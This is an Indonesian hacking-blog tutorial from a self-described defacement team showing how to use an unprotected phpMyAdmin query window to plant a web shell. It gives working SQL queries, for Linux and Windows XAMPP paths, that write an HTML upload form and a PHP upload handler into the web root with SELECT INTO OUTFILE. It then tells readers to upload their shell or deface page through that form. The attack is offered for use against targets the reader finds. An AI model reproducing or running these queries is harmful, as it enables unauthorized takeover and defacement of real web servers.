Home Hacking Info IT Komputer Dan Laptop Tutorial Tutorial Upload Shell/File melalui phpMyAdmin Di Xampp

Monday, July 13, 2015

Tutorial Upload Shell/File melalui phpMyAdmin Di Xampp

Diterbitkan

Author : Aihara Anwaru
Codename : Falcon-G21
Team : Falcon-G21 Team Dark
Title : Tutorial Upload Shell/File melalui phpMyAdmin Di Xampp

Let's Begin Read My Tutorial ^_^
Pertama cari targetnya, di sini saya localhost dengan link mrlover21.net
oke pertama
kita buka
http://mrlover21.net/phpmyadmin/querywindow.php
dan akan muncul seperti gambar di bawah ini :



Note : jika phpmyadmin di proteksi oleh password makan kita tidak bisa membobolnya

ok, next ke langkah selanjutnya
di sini saya punya 2 bentuk query 1 untuk linux dan 2 untuk windows
karena saya pakai windows maka
kita pakai query ke-2

Query 1 untuk linux :

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;


Query 2 untuk windows :

use mysql;
DROP TABLE IF EXISTS `temptab1`;
CREATE TABLE temptab1 (codetab text);
INSERT INTO temptab1 (codetab) values ('<form enctype="multipart/form-data" action="upload99.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/form99.php' from temptab1;
DROP TABLE temptab1;
FLUSH LOGS;

lebih lengkap liat screenshot di bawah ini :



dan tekan go, jika berhasil maka akan muncul seperti gambar dibawah ini :



Note : code query yang kita masukan di atas itu berfungsi menjadi form uploadernya
sekarang coba kita panggil formnya
karena nama filenya form99.php
maka kita panggil http://mrlover21.net/form99.php
liat ssnya di bawah :



sekarang kita lanjut ke langkah selanjutnya, yaitu membuat confirm dai form uploader
sama seperti query untuk form uploadernya, di sini terdapat 2 query
kita pakai query untuk windows

Query 1 untuk linux :

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "/opt/lampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Query 2 untuk windows :

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/xampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload99.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS

lebih jelas liat screenshot dibawah ini





jika sudah
sekarang tinggal upload shellnya dengan cara pangill file form99.php
contoh : mrlover21.net/form99.php lalu browse file shellmu atau file defacemu ^_^
lalu tekan upload tara shell/file defacemu sudah ke upload
tinggal buka deh contoh
http://mrlover21.net/www.mrlover21.org.php



sekian! terima kasih ^_^
Jangan lupa berkunjung terus ya ^_^
Falcon-G21 Team Dark



loading short url

Artikel Terkait

Anas TAV

Next Post
Previous Post


EmoticonEmoticon

Subscribe to: Post Comments (Atom)